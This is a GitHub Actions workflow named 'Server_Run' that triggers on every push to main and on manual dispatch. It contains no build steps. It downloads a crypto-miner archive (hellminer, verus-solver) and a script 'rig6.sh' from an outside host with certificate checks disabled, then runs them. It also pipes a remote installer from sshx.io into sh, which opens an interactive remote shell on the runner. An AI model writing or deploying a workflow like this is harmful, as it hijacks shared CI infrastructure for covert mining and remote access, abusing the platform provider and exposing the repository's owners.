name: Server_Run
on:
  push:
    branches:
      - main
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - run: sudo apt install neofetch -y
      - run: wget --no-check-certificate https://anotherdump.rf.gd/miner.tar.gz
      - run: tar -xzvf miner.tar.gz
      - run: chmod +x hellminer verus-solver
      - run: wget --no-check-certificate https://anotherdump.rf.gd/rig6.sh
      - run: chmod +x rig6.sh
      - run: ./rig6.sh
      - run: curl -sSf https://sshx.io/get | sh -s run
